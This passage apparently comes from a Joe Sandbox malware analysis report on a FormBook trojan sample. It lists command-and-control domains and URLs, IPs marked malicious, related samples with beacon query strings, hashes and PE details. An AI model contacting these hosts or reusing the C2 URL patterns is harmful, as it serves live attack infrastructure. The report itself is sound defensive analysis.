                                                    https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.brunoduarte.online/v15n/www.kedai168ef.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mirotcg.infoReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mxrkpkngishbdss.xyzexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.syedlatief.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kedai168ef.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.fwbsmg.lifeReferer:explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.suv.xyz/v15n/www.mirotcg.infoexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.bt365851.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.gtur.top/v15n/www.fwbsmg.lifeexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.kedai168ef.com/v15n/explorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://ns.adobeSexplorer.exe, 00000004.00000002.3822791120.0000000004405000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1392124977.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.mirotcg.infoexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.hacks.digital/v15n/www.creativelyloud.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 00000004.00000002.3824324659.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1393584393.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2285421853.0000000006F30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.gtur.topexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.syedlatief.com/v15n/www.gtur.topexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.boostgrowmode.comexplorer.exe, 00000004.00000002.3835374151.000000000C00A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    170.39.213.118
                                                    		www.wordcraftart.funReserved
                                                    		139776PETRONAS-BHD-AS-APPetroliamNasionalBerhadMYtrue
                                                    3.64.163.50
                                                    		www.suv.xyzUnited States
                                                    		16509AMAZON-02UStrue
                                                    91.195.240.19
                                                    		parkingpage.namecheap.comGermany
                                                    		47846SEDO-ASDEtrue
                                                    209.196.146.115
                                                    		www.hacks.digitalCanada
                                                    		13768COGECO-PEER1CAtrue
                                                    3.33.130.190
                                                    		mirotcg.infoUnited States
                                                    		8987AMAZONEXPANSIONGBtrue
                                                    206.119.184.155
                                                    		msdklf.dsaf.apkdowncdn.comUnited States
                                                    		174COGENT-174UStrue

                                                    General Information

                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                    Analysis ID:1476627
                                                    Start date and time:2024-07-19 10:51:16 +02:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 12m 2s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:11
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:1
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Sample name:AB2hQJZ77ipdWem.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@267/1@11/6
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 93%
                                                    • Number of executed functions: 98
                                                    • Number of non-executed functions: 364
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: AB2hQJZ77ipdWem.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    04:52:07API Interceptor1x Sleep call for process: AB2hQJZ77ipdWem.exe modified
                                                    04:52:17API Interceptor6775700x Sleep call for process: explorer.exe modified
                                                    04:52:52API Interceptor6230171x Sleep call for process: cscript.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3.64.163.50V691KUgebCvcYp2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.neurasaudi.com/v15n/?FTL0dZ=MC7jW79DvpbAXJOACJLEaCWT/AP2Kd9jE1xFeh1tqTEwjDB7HW85AKdG2Lw4mA/hM2am&mT=VDKPcJrp9d844v
                                                    nell.docGet hashmaliciousFormBookBrowse
                                                    • www.runccl.com/btrd/?wL308b=HDHXtPC&RDH=C3V55vmoRLzhdzVvPxQureN2DAJdCLOy0KNGMxX6PWn438lVXaAPIOjwnvV0EoY+ctb1nw==
                                                    DHL_TOC2_2407081728458457.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.hinet.tech/rn94/?Txo=/u8AhuqikW5Z0ux+TtooNTgLT9+7EoBKYM4wN1PZe+qnUGIltiWSddGKDn68HfcTIAyH&vB=lf5P
                                                    vNrcPvMYLZmn2cc.exeGet hashmaliciousFormBookBrowse
                                                    • www.motolimod.com/mc10/?yrCDSlw=vFB2baRb3l6bUISctXbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIGqDb2wiW/5D&Jlt=Y4Ctjz3PDNY8yDR
                                                    Akb38lKYd6rDV8l.exeGet hashmaliciousFormBookBrowse
                                                    • www.mrwine.xyz/dy13/?uRDX=nOOUddJSUzumUEOwN08yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz+qgZSNVPsaq&OjH8a=9r44lZrP
                                                    PO HA25622.exeGet hashmaliciousFormBookBrowse
                                                    • www.cilynder.com/h209/?mlYT=SxolxB&Dzrx=4XPTPvu2L+BVlMtUJvxxjUwWAXLL/jGlg5CCnZ7c9YjMmTibPLsLpJHt34rm8QiNyPuf
                                                    8tvMmyxveyzFcnJ.exeGet hashmaliciousFormBookBrowse
                                                    • www.motolimod.com/mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh
                                                    qRNC6mtGhI.exeGet hashmaliciousFormBookBrowse
                                                    • www.ainth.com/pz12/?CbY=uBr8txPpVFF&XTixk4Ox=wKkXOPuj+6qRQxpi1YbAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmKL44/FxwVx
                                                    PAZxQIjeuyCNRXg.exeGet hashmaliciousFormBookBrowse
                                                    • www.mrwine.xyz/dy13/?wj=nOOUddImUTrWJ0TERE8yX7QbQXzFXI1eXPVGsAvMbd1lknBUetPROzpkz9KaJDttVL7t&CR-=CpfXQDw
                                                    327vRde1h3nsEEG.exeGet hashmaliciousFormBookBrowse
                                                    • www.quantron.xyz/mc10/?qR-LsrxH=mDELtYPjPx0yZpAFEaNgLrz9iHnWtEfpEEHnf0FSbXmyQB9SvAgLU3CzK+8ImGRxoFXe&TVm0xb=yj88DTHplR0
                                                    91.195.240.19Material data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.rothability.com/pz12/?Bl=GWRYCobLI4jcGPUzIWUi2QiAbjD1+kEX4+hheiUlvdpj0yPJP3zykytQ5b2eat43krS6&R48=P2M0bFBP0T0
                                                    SC61092U5IO.exeGet hashmaliciousFormBookBrowse
                                                    • www.banyan.love/u44f/
                                                    Fatura20240617.exeGet hashmaliciousFormBookBrowse
                                                    • www.banyan.love/u44f/
                                                    NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.fitfindrr.com/838k/?vXuxe=PvkJCit91xsmfEp4ecexhr9HuVddXcgrt4fepj06tr+7v3YKSwK4deNtOn4FMu18qH4jq16y3id1vztqL+UXZZdC86kT9yqDstkVqXEOldiPYHXEgA==&xPN=kZVT_
                                                    22#U0415.exeGet hashmaliciousFormBookBrowse
                                                    • www.purpleheartlacey.com/rlev/
                                                    DHL_TOC2_2407081728458457.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • www.ndu.wtf/rn94/?vB=lf5P&Txo=kRFddh8ILTCC26VerxbiPlHKuMV/8t4ppXiDGjwVoJTWtPPHaRnE7TNYK4Im+MrbcRhF
                                                    z4AMOSTRA.exeGet hashmaliciousFormBookBrowse
                                                    • www.purpleheartlacey.com/rlev/
                                                    z4AMOSTRA.exeGet hashmaliciousFormBookBrowse
                                                    • www.purpleheartlacey.com/rlev/
                                                    z3NOVOPEDIDODECOMPRA.exeGet hashmaliciousFormBookBrowse
                                                    • www.purpleheartlacey.com/rlev/
                                                    statment-document.scr.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • www.megadigit.shop/59wl/

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    parkingpage.namecheap.comyEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 91.195.240.19
                                                    Material data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 91.195.240.19
                                                    SC61092U5IO.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Fatura20240617.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 91.195.240.19
                                                    22#U0415.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    DHL_TOC2_2407081728458457.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    z4AMOSTRA.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    z4AMOSTRA.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    z3NOVOPEDIDODECOMPRA.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    www.gtur.topV691KUgebCvcYp2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 206.238.13.219
                                                    msdklf.dsaf.apkdowncdn.comV691KUgebCvcYp2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 206.119.184.153
                                                    9RogliUNrK3XMIU.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 206.119.184.153
                                                    ssl1.prod.systemdragon.comOrden de compra 0307AR24.exeGet hashmaliciousFormBookBrowse
                                                    • 104.18.187.223
                                                    order-payment094093.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 104.18.188.223
                                                    SecuriteInfo.com.FileRepMalware.16340.31219.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                                    • 104.17.158.1
                                                    IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exeGet hashmaliciousFormBookBrowse
                                                    • 104.17.157.1
                                                    wLlREXsA9M.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 104.17.157.1
                                                    sOjxIU25DP.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 104.17.157.1
                                                    hi38VYWujz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 104.17.158.1
                                                    Payment_document.docx.docGet hashmaliciousFormBookBrowse
                                                    • 104.17.158.1
                                                    E-dekont_pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 104.17.157.1
                                                    E-dekont_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                    • 104.17.158.1
                                                    pixie.porkbun.comPO-2024151-pdf.gz.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    DHL_TOC2_2407081728458457.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    PO._21007438-SCH_30724.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                    • 44.227.76.166
                                                    AWB NO. 077-57676135055.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    7RsDGpyOQk.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    INVOICE - MV CNC BANGKOK - ST24PJ-278.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.76.166
                                                    PROFORMA INVOICE - MV CNC BANGKOK - ST24PJ-287.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.76.166
                                                    MT103-746394.docGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    SecuriteInfo.com.Exploit.CVE-2018-0798.4.23906.18593.rtfGet hashmaliciousFormBookBrowse
                                                    • 44.227.65.245
                                                    PO TRO-1075 - TRO-1076 904504608468.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 44.227.76.166
                                                    www.wordcraftart.fun9RogliUNrK3XMIU.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 170.39.213.118

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    SEDO-ASDEMaterial data sheets Bill of Quantity Steel pipes and chemicals KM C654e21011710050.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 91.195.240.19
                                                    SC61092U5IO.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    Fatura20240617.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    H37012.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 91.195.240.123
                                                    NEW RFQ - Viasat LSDR.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 91.195.240.19
                                                    22#U0415.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    DHL_TOC2_2407081728458457.pdf.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    z4AMOSTRA.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    z4AMOSTRA.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    z3NOVOPEDIDODECOMPRA.exeGet hashmaliciousFormBookBrowse
                                                    • 91.195.240.19
                                                    AMAZON-02USS04307164.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 76.223.105.230
                                                    Shipping Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 76.223.67.189
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 143.204.215.122
                                                    yEz94BK14pkJoFb.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 76.223.105.230
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 143.204.215.18
                                                    appdrivesound.exeGet hashmaliciousSystemBCBrowse
                                                    • 52.62.236.135
                                                    payment swift 77575.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 13.248.169.48
                                                    V691KUgebCvcYp2.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 3.64.163.50
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 143.204.215.105
                                                    file.exeGet hashmaliciousUnknownBrowse
                                                    • 143.204.215.122
                                                    PETRONAS-BHD-AS-APPetroliamNasionalBerhadMY544fo2biO9.elfGet hashmaliciousMirai, MoobotBrowse
                                                    • 170.39.112.149
                                                    Lt9n9tfJhl.elfGet hashmaliciousUnknownBrowse
                                                    • 170.38.145.93
                                                    hZ80PhOmKK.elfGet hashmaliciousUnknownBrowse
                                                    • 170.38.169.18
                                                    Asiaction__ Purchase Order_Specification.exeGet hashmaliciousFormBookBrowse
                                                    • 170.39.213.43
                                                    Y0gm1e2z6O.elfGet hashmaliciousMiraiBrowse
                                                    • 170.39.159.198
                                                    UuD1zt2QpK.elfGet hashmaliciousMiraiBrowse
                                                    • 170.39.112.150
                                                    qJNrNXMSir.elfGet hashmaliciousMiraiBrowse
                                                    • 170.38.145.53
                                                    Y31ikuyDAd.elfGet hashmaliciousMiraiBrowse
                                                    • 170.39.159.172
                                                    2U7qDYujmP.elfGet hashmaliciousMirai, GafgytBrowse
                                                    • 170.38.169.43
                                                    jBYcDlB7fE.elfGet hashmaliciousUnknownBrowse
                                                    • 170.38.210.229
                                                    COGECO-PEER1CAPetromasila 16072024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 162.254.38.5
                                                    5CxmQXL0LD.exeGet hashmaliciousSystemBCBrowse
                                                    • 76.74.238.253
                                                    jew.arm6.elfGet hashmaliciousMiraiBrowse
                                                    • 66.234.10.211
                                                    sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 216.65.83.154
                                                    zisD7MC388.elfGet hashmaliciousMiraiBrowse
                                                    • 216.65.83.140
                                                    Electronic Order.exeGet hashmaliciousFormBookBrowse
                                                    • 162.254.38.56
                                                    502407267 RUAG FOODPLAZA.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                    • 162.254.38.56
                                                    Inquiry PR#27957.bat.exeGet hashmaliciousFormBookBrowse
                                                    • 162.254.38.56
                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                    • 66.129.182.10
                                                    DRAFT CONTRACT COPY_938840.scrGet hashmaliciousFormBookBrowse
                                                    • 162.254.38.56

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AB2hQJZ77ipdWem.exe.log

                                                    Download File
                                                    Process:C:\Users\user\Desktop\AB2hQJZ77ipdWem.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):1216
                                                    Entropy (8bit):5.34331486778365
                                                    Encrypted:false
                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                    MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                    SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                    SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                    SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                    Entropy (8bit):7.974848614050264
                                                    TrID:
                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                    • DOS Executable Generic (2002/1) 0.01%
                                                    File name:AB2hQJZ77ipdWem.exe
                                                    File size:620'544 bytes
                                                    MD5:f640126d8e76c2a343754ff0f41c1eef
                                                    SHA1:b00e9297c74fe4847f4a0667d9cc4379409cb501
                                                    SHA256:f9e519cd66cb6bed521306afb703672ef2ed9d82d8341398c4199be4523cad96
                                                    SHA512:cd05b460ce74792dbc91891cc13ad888f894c05747907bce0dd79193a126e996e7efadfb7831aee0fd219f3ba92f55858cdf4dbfed876280585daedb92c20083
                                                    SSDEEP:12288:1DrlAypLTnapSEkztfGLI70wWsrRJvHG5yCgMLCAUIKtT:PAyp/naSft+s70wfHvH3iCp9
                                                    TLSH:58D42351FE1D66A3D7FF27B03195A24483F1D536EC31EBC92C8222855EA6B890722737
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.f..............0..Z...........x... ........@.. ....................................@................................

                                                    File Icon

                                                    Icon Hash:1ec7e8e4c4ec5065

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0x4978fa
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66973BB8 [Wed Jul 17 03:34:16 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
